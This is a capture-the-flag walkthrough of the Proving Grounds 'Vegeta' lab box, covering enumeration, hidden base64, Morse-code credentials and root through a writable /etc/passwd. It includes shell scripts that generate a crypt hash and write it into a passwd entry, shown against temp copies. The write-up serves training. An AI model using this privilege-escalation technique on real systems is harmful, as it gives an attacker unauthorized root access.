vegeta from dragonballz

This was fun, but there's a funky rabbit hole involving a QR code image that I'll include just because it's interesting and a good exercise in working through an encoding.

1. Scan the target to find 22/tcp (SSH) and 80/tcp (HTTP) open.
2. SSH on 22 is rarely the way in without credentials, so browse to http://[targetIP] to look around. The page only shows a JPEG, vegeta1.jpg. Useless.
3. Run Dirbuster against the site to find http://targetIP/find_me/find_me.html.
4. wget the HTML and tail -1 it: the last line is a base64 string sitting in an HTML comment, so it never showed in the browser.
5. Paste it into CyberChef. One From Base64 just gives you more base64; decode it twice and the output is a PNG containing a QR code, which scans to say password is topshellv.png. That password isn't used anywhere on the box, but it was an interesting detour.
6. Back on track: Dirbuster also turns up a directory holding a WAV file, hahahaha.wav. Listen to it. It's Morse code.
7. Upload the WAV to an online Morse-code audio decoder and it decodes to a username and password.
8. SSH in with those credentials; the first flag is /home/[username from morse code]/local.txt.
9. Run linpeas.sh; it flags /etc/passwd as writable by our user.
10. openssl passwd spits out a crypt hash (pass -6 for SHA-512 explicitly: with no algorithm flag, older OpenSSL falls back to DES crypt, which silently truncates the password to 8 characters). Paste the hash into the trunks line in /etc/passwd, replacing the x between the first and second colons. That x tells the system the real hash lives in /etc/shadow; a hash placed there is checked directly instead. Whichever line you edit is the account you get when you su to it, so a root shell needs the hash in a UID 0 line.
11. su with that password, then cat /root/proof.txt for the second flag.
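The base64 peeling from steps 4 and 5, as an added shell example that is not from the original write-up: it pulls the trailing HTML comment out of a stand-in find_me.html constructed inline (the real file's string is not reproduced), then strips base64 layers until the output stops looking like base64. The helper names and the constructed HTML are my own.

```shell
#!/bin/sh
# Added example, not code from the original write-up. The HTML below is
# constructed here to stand in for find_me.html; the real string is not
# reproduced. Helper names are my own.
set -u

# True when FILE is non-empty and contains only the base64 alphabet,
# '=' padding and whitespace. A decoded PNG (first byte 0x89) or a plain
# sentence with spaces and punctuation fails this check, which is what
# stops the peeling loop at the right layer.
looks_like_base64() {
  [ -s "$1" ] && [ "$(tr -d 'A-Za-z0-9+/=\n\r\t ' < "$1" | wc -c | tr -d ' ')" -eq 0 ]
}

# peel_base64 IN OUT: base64-decode IN repeatedly while the result still
# looks like base64 and decodes cleanly. Writes the final layer to OUT and
# prints how many layers were removed.
peel_base64() {
  cur=$(mktemp); nxt=$(mktemp)
  cp "$1" "$cur"
  layers=0
  while looks_like_base64 "$cur" && base64 -d "$cur" > "$nxt" 2>/dev/null && [ -s "$nxt" ]; do
    layers=$((layers + 1))
    mv "$nxt" "$cur"
    nxt=$(mktemp)
  done
  cp "$cur" "$2"
  rm -f "$cur" "$nxt"
  echo "$layers"
}

# extract_last_comment HTML: take the last line of the file and keep only
# what sits inside its <!-- ... --> comment, whitespace removed.
extract_last_comment() {
  tail -n 1 "$1" | sed -e 's/^.*<!--//' -e 's/-->.*$//' | tr -d ' \t\r'
}

# Constructed demo: a marker sentence encoded twice and hidden in a comment
# on the last line, where the box put its string.
demo() {
  work=$(mktemp -d)
  inner=$(printf 'password is topshellv.png' | base64 | tr -d '\n')
  outer=$(printf '%s' "$inner" | base64 | tr -d '\n')
  printf '<html><body><h1>find me</h1></body></html>\n<!-- %s -->\n' "$outer" \
    > "$work/find_me.html"

  extract_last_comment "$work/find_me.html" > "$work/layer0"
  layers=$(peel_base64 "$work/layer0" "$work/decoded")
  echo "layers peeled: $layers"
  # On the real box this is the point where `file decoded` reports PNG image data.
  command -v file > /dev/null 2>&1 && file "$work/decoded"
  cat "$work/decoded"; echo
  rm -rf "$work"
}
demo
```

The stop condition is deliberately the input's character set rather than a decoder error: GNU base64 rejects stray characters, but a short alphanumeric plaintext can still be accepted as one more bogus layer, so check what `file` says on the final output before trusting the count.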

Main takeaways:
– If base64 decodes to something that still looks like base64, decode again (or try another decoder) until `file` recognises the output; the useful artefact may be several layers down.
– An audio file of Morse code can be decoded by an online Morse audio decoder instead of by ear.
– Read every part of every file, including HTML comments: the base64 was at the very bottom of find_me.html, commented out so it never rendered.
– linpeas found /etc/passwd writable straight away. A crypt hash generated with openssl and dropped into the password field is honoured in place of /etc/shadow, so we can su with a password we chose. Weird but awesome.
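The /etc/passwd edit from steps 9 to 11, as an added shell example that is not from the original write-up: it runs against a constructed copy of /etc/passwd in a temp file (the sample lines and the password are made up), generates a SHA-512 crypt hash with openssl, swaps it into one user's password field without disturbing the rest of the file, and checks the hash against the password before you commit to su. The helper names are my own.

```shell
#!/bin/sh
# Added example, not code from the original write-up. Everything runs against
# a constructed copy of /etc/passwd in a temp file; the sample lines, the
# user names and the password are made up for the demo.
set -u

# Field 2 of an /etc/passwd line is the password field. "x" means "look in
# /etc/shadow"; a crypt(3) hash placed there is checked directly instead,
# which is why a writable /etc/passwd is game over.

# passwd_field FILE USER: print the password field of USER's line.
passwd_field() { awk -F: -v u="$2" '$1 == u { print $2 }' "$1"; }

# passwd_uid FILE USER: print the UID field. `su USER` gives you a shell with
# this UID; only a line with UID 0 gives a root shell.
passwd_uid() { awk -F: -v u="$2" '$1 == u { print $3 }' "$1"; }

# make_hash PASSWORD: SHA-512 crypt hash ("$6$salt$...") with a random salt.
# -6 is passed explicitly: with no algorithm flag, OpenSSL before 3.0 falls
# back to DES crypt, which silently truncates the password to 8 characters.
make_hash() { openssl passwd -6 "$1"; }

# verify_hash HASH PASSWORD: recompute with the salt embedded in HASH and
# compare; proves the field you wrote matches the password you will su with.
verify_hash() {
  salt=$(printf '%s' "$1" | cut -d '$' -f 3)
  [ "$(openssl passwd -6 -salt "$salt" "$2")" = "$1" ]
}

# set_passwd_field FILE USER HASH: swap field 2 of USER's line for HASH and
# leave every other line and field alone. Written back with `cat >` rather
# than mv: on the box you have write access to the file, not to /etc, and
# mv would also replace the file's owner and mode.
set_passwd_field() {
  tmp=$(mktemp)
  awk -F: -v u="$2" -v h="$3" 'BEGIN { OFS = ":" } $1 == u { $2 = h } { print }' "$1" > "$tmp" \
    && cat "$tmp" > "$1"
  rm -f "$tmp"
}

# Constructed demo: edit the trunks line the way the write-up does, then show
# which UID that line carries.
demo() {
  command -v openssl > /dev/null 2>&1 || { echo "openssl not found; skipping demo"; return 0; }
  pw=$(mktemp)
  cat > "$pw" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
EOF
  [ -w "$pw" ] && echo "$pw is writable (the condition linpeas flagged on the box)"

  hash=$(make_hash 'Sup3rSecret!')
  set_passwd_field "$pw" trunks "$hash"
  verify_hash "$(passwd_field "$pw" trunks)" 'Sup3rSecret!' && echo "trunks hash verifies"
  echo "trunks line now: $(grep '^trunks:' "$pw")"
  echo "su trunks gives uid $(passwd_uid "$pw" trunks); root's line has uid $(passwd_uid "$pw" root)"
  rm -f "$pw"
}
demo
```

Two things worth checking before you type su on the real box: the hash must sit in the line of the account you su to, and that line's UID is the one you end up with. Running verify_hash on the field you just wrote catches a pasted-in hash that got mangled by the editor, which otherwise only shows up as a silent "Authentication failure".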

Try a Proving Grounds box here.

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.